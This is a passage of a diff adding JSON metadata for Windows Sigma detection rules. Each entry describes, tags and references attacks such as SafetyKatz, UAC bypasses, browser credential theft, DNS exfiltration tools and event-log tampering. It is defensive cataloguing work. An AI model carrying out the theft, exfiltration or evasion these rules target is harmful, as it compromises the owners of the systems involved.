RDP", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/12", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_ssh_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ssh_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572" + ] + }, + "uuid": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", + "value": "Suspicious SSH Usage RDP Tunneling" + }, + { + "description": "Detects usage of \"cdb.exe\" to launch 64-bit shellcode or arbitrary processes or commands from a debugger script file", + "meta": { + "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali", + "creation_date": "2019/10/26", + "falsepositive": [ + "Legitimate use of debugging tools" + ], + "filename": "proc_creation_win_lolbin_cdb.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Cdb/", + "https://twitter.com/nas_bench/status/1534957360032120833", + "https://web.archive.org/web/20170715043507/http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cdb.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106", + "attack.defense_evasion", + "attack.t1218", + "attack.t1127" + ] + }, + "uuid": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2", + "value": "WinDbg/CDB LOLBIN Usage" + }, + { + "description": "Shadow Copies creation using operating systems utilities, possible credential access", + "meta": { + "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Legitimate administrator working with shadow copies, access for backup purposes" + ], + "filename": "proc_creation_win_shadow_copies_creation.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shadow_copies_creation.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1003.002", + "attack.t1003.003" + ] + }, + "uuid": "b17ea6f7-6e90-447e-a799-e6c0a493d6ce", + "value": "Shadow Copies Creation Using Operating Systems Utilities" + }, + { + "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/20", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_hack_safetykatz.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/GhostPack/SafetyKatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_safetykatz.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "b1876533-4ed5-4a83-90f3-b8645840a413", + "value": "SafetyKatz Hack Tool" + }, + { + "description": "An adversary might use WMI to check if a certain Remote Service is running on a remote device.\nWhen the test completes, a service information will be displayed on the screen if it exists.\nA common feedback message is that \"No instance(s) Available\" if the service queried is not running.\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmic_remote_service.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_service.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "09af397b-c5eb-4811-b2bb-08b3de464ebf", + "value": "WMI Reconnaissance List Remote Services" + }, + { + "description": "Detects Archer malware invocation via rundll32", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/06/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_crime_fireball.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100", + "https://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_crime_fireball.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218.011" + ] + }, + "uuid": "3d4aebe0-6d29-45b2-a8a4-3dfde586a26d", + "value": "Fireball Archer Install" + }, + { + "description": "Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.", + "meta": { + "author": "Nik Seetharaman, frack113", + "creation_date": "2019/01/16", + "falsepositive": [ + "Legitimate MWC use (unlikely in modern enterprise environments)" + ], + "filename": "proc_creation_win_workflow_compiler.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_workflow_compiler.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1127", + "attack.t1218" + ] + }, + "uuid": "419dbf2b-8a9b-4bea-bf99-7544b050ec8d", + "value": "Microsoft Workflow Compiler" + }, + { + "description": "Attackers can use print.exe for remote file copy", + "meta": { + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", + "creation_date": "2020/10/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_print.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Print/", + "https://twitter.com/Oddvarmoe/status/985518877076541440", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_print.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "bafac3d6-7de9-4dd9-8874-4a1194b493ed", + "value": "Abusing Print Executable" + }, + { + "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", + "meta": { + "author": "frack113", + "creation_date": "2022/09/25", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_w32tm.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md", + "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_w32tm.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1124" + ] + }, + "uuid": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "value": "Use of W32tm as Timer" + }, + { + "description": "Detects Elise backdoor acitivty as used by APT32", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/01/31", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_elise.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://community.rsa.com/community/products/netwitness/blog/2018/02/13/lotus-blossom-continues-asean-targeting", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_elise.yml" + ], + "tags": [ + "attack.g0030", + "attack.g0050", + "attack.s0081", + "attack.execution", + "attack.t1059.003" + ] + }, + "uuid": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "value": "Elise Backdoor" + }, + { + "description": "Detects different process creation events as described in Malwarebytes's threat report on Lazarus group activity", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/04/20", + "falsepositive": [ + "Should not be any false positives" + ], + "filename": "proc_creation_win_apt_lazarus_activity_apr21.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_apr21.yml" + ], + "tags": [ + "attack.g0032", + "attack.execution", + "attack.t1106" + ] + }, + "uuid": "4a12fa47-c735-4032-a214-6fab5b120670", + "value": "Lazarus Activity Apr21" + }, + { + "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", + "meta": { + "author": "Cian Heasley, Florian Roth", + "creation_date": "2020/07/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_webshell_recon_detection.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://ragged-lab.blogspot.com/2020/07/webshells-automating-reconnaissance.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_recon_detection.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "f64e5c19-879c-4bae-b471-6d84c8339677", + "value": "Webshell Recon Detection Via CommandLine & Processes" + }, + { + "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\nWeb browsers typically store the credentials in an encrypted format within a credential store.\n", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_copy_browser_data.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_copy_browser_data.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.003" + ] + }, + "uuid": "47147b5b-9e17-4d76-b8d2-7bac24c5ce1b", + "value": "Potential Browser Data Stealing" + }, + { + "description": "Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.", + "meta": { + "author": "Janantha Marasinghe", + "creation_date": "2020/09/26", + "falsepositive": [ + "This may have false positives on hosts where Virtualbox is legitimately being used for operations" + ], + "filename": "proc_creation_win_run_virtualbox.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://attack.mitre.org/techniques/T1564/006/", + "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/", + "https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_virtualbox.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.006", + "attack.t1564" + ] + }, + "uuid": "bab049ca-7471-4828-9024-38279a4c04da", + "value": "Detect Virtualbox Driver Installation OR Starting Of VMs" + }, + { + "description": "Detects suspicious renamed SysInternals DebugView execution", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/05/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_renamed_debugview.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.epicturla.com/blog/sysinturla", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_debugview.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ] + }, + "uuid": "cd764533-2e07-40d6-a718-cfeec7f2da7f", + "value": "Renamed SysInternals Debug View" + }, + { + "description": "Detects suspicious mshta process patterns", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_mshta_pattern.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.echotrail.io/insights/search/mshta.exe", + "https://en.wikipedia.org/wiki/HTML_Application", + "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshta_pattern.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106" + ] + }, + "uuid": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", + "value": "Suspicious MSHTA Process Patterns" + }, + { + "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", + "meta": { + "author": "frack113", + "creation_date": "2022/12/25", + "falsepositive": [ + "Legitimate use of the library" + ], + "filename": "proc_creation_win_ps_download_com_cradles.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57", + "https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ps_download_com_cradles.yml" + ], + "tags": "No established tags" + }, + "uuid": "02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf", + "value": "Potential COM Objects Download Cradles Usage - Process Creation" + }, + { + "description": "Detects suspicious encoded character syntax often used for defense evasion", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_powershell_encoded_param.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1281103918693482496", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_encoded_param.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "e312efd0-35a1-407f-8439-b8d434b438a6", + "value": "PowerShell Encoded Character Syntax" + }, + { + "description": "Detects the use of 3proxy, a tiny free proxy server", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/09/13", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_3proxy_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/3proxy/3proxy", + "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572" + ] + }, + "uuid": "f38a82d2-fba3-4781-b549-525efbec8506", + "value": "3Proxy Usage" + }, + { + "description": "Detects a suspicious curl process start the adds a file to a web request", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/03", + "falsepositive": [ + "Scripts created by developers and admins" + ], + "filename": "proc_creation_win_susp_curl_fileupload.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://curl.se/docs/manpage.html", + "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", + "https://twitter.com/d1r4c/status/1279042657508081664", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_curl_fileupload.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567", + "attack.t1105" + ] + }, + "uuid": "00bca14a-df4e-4649-9054-3f2aa676bc04", + "value": "Suspicious Curl File Upload" + }, + { + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_ieinstal.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_ieinstal.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "80fc36aa-945e-4181-89f2-2f907ab6775d", + "value": "UAC Bypass Using IEInstal - Process" + }, + { + "description": "ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.", + "meta": { + "author": "frack113", + "creation_date": "2021/11/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_zipexec.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Tylous/ZipExec", + "https://twitter.com/SBousseaden/status/1451237393017839616", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_zipexec.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" + ] + }, + "uuid": "90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", + "value": "Suspicious ZipExec Execution" + }, + { + "description": "Well-known DNS Exfiltration tools execution", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate usage of iodine or dnscat2 — DNS Exfiltration tools (unlikely)" + ], + "filename": "proc_creation_win_dns_exfiltration_tools_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dns_exfiltration_tools_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.001", + "attack.command_and_control", + "attack.t1071.004", + "attack.t1132.001" + ] + }, + "uuid": "98a96a5a-64a0-4c42-92c5-489da3866cb0", + "value": "DNS Exfiltration and Tunneling Tools Execution" + }, + { + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "meta": { + "author": "frack113", + "creation_date": "2022/02/13", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_gotoopener.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gotoopener.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "b6d98a4f-cef0-4abf-bbf6-24132854a83d", + "value": "Use of GoToAssist Remote Access Software" + }, + { + "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.", + "meta": { + "author": "frack113", + "creation_date": "2021/12/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_findstr_gpp_passwords.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.006/T1552.006.md#atomic-test-1---gpp-passwords-findstr", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.006" + ] + }, + "uuid": "91a2c315-9ee6-4052-a853-6f6a8238f90d", + "value": "Findstr GPP Passwords" + }, + { + "description": "Detects encoded base64 MZ header in the commandline", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/12", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_inline_base64_mz_header.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_inline_base64_mz_header.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", + "value": "Base64 MZ Header In CommandLine" + }, + { + "description": "Detects execution of REGSVR32.exe with DLL masquerading as image files", + "meta": { + "author": "frack113", + "creation_date": "2021/11/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_regsvr32_image.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", + "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/", + "https://guides.lib.umich.edu/c.php?g=282942&p=1885348", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_image.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010" + ] + }, + "uuid": "089fc3d2-71e8-4763-a8a5-c97fbb0a403e", + "value": "Suspicious Regsvr32 Execution With Image Extension" + }, + { + "description": "Detects an attempt to execute code or create service on remote host via winrm.vbs.", + "meta": { + "author": "Julia Fomina, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "Legitimate use for administartive purposes. Unlikely" + ], + "filename": "proc_creation_win_susp_winrm_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/lateral-movement-winrm-wmi/", + "https://twitter.com/bohops/status/994405551751815170", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrm_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", + "value": "Remote Code Execute via Winrm.vbs" + }, + { + "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", + "meta": { + "author": "Ecco, E.M. Anhaus, oscd.community", + "creation_date": "2019/09/26", + "falsepositive": [ + "Admin activity", + "Scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_fsutil_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md", + "https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ] + }, + "uuid": "add64136-62e5-48ea-807e-88638d02df1e", + "value": "Fsutil Suspicious Invocation" + }, + { + "description": "Detects a suspicious copy command to or from an Admin share or remote", + "meta": { + "author": "Florian Roth, oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", + "creation_date": "2019/12/30", + "falsepositive": [ + "Administrative scripts" + ], + "filename": "proc_creation_win_susp_copy_lateral_movement.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1211636381086339073", + "https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html", + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.collection", + "attack.exfiltration", + "attack.t1039", + "attack.t1048", + "attack.t1021.002" + ] + }, + "uuid": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", + "value": "Copy from Admin Share" + }, + { + "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/09/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_icmluautil.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/uac-bypass-via-icmluautil-elevated-com-interface.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "value": "UAC Bypass via ICMLuaUtil" + }, + { + "description": "Detects the use of SharpEvtHook, a tool to tamper with Windows event logs", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/09/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sysmon_disable_sharpevtmute.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/bats3c/EvtMute", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_disable_sharpevtmute.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "value": "SharpEvtMute EvtMuteHook Load" + }, + { + "description": "Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", + "meta": { + "author": "Sai Prashanth Pulisetti @pulisettis", + "creation_date": "2022/12/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_impersonate_tool.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/sensepost/impersonate", + "https://sensepost.com/blog/2022/abusing-windows-tokens-to-compromise-active-directory-without-touching-lsass/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_impersonate_tool.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1134.001", + "attack.t1134.003" + ] + }, + "uuid": "cf0c254b-22f1-4b2b-8221-e137b3c0af94", + "value": "Impersonate Execution" + }, + { + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/17", + "falsepositive": [ + "Rare intended use of hidden services" + ], + "filename": "proc_creation_win_using_set_service_to_hide_services.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", + "https://twitter.com/Alh4zr3d/status/1580925761996828672", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_set_service_to_hide_services.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" + ] + }, + "uuid": "514e4c3a-c77d-4cde-a00f-046425e2301e", + "value": "Abuse of Service Permissions to Hide Services Via Set-Service" + }, + { + "description": "This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed,\nUsee to Query/modify DNS records for Active Directory integrated DNS via LDAP\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_adidnsdump.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-9---remote-system-discovery---adidnsdump", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adidnsdump.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018" + ] + }, + "uuid": "26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160", + "value": "Suspicious Execution of Adidnsdump" + }, + { + "description": "Detects the use of the Dinject PowerShell cradle based on the specific flags", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/12/07", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_dinjector.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/snovvcrash/DInjector", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dinjector.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055" + ] + }, + "uuid": 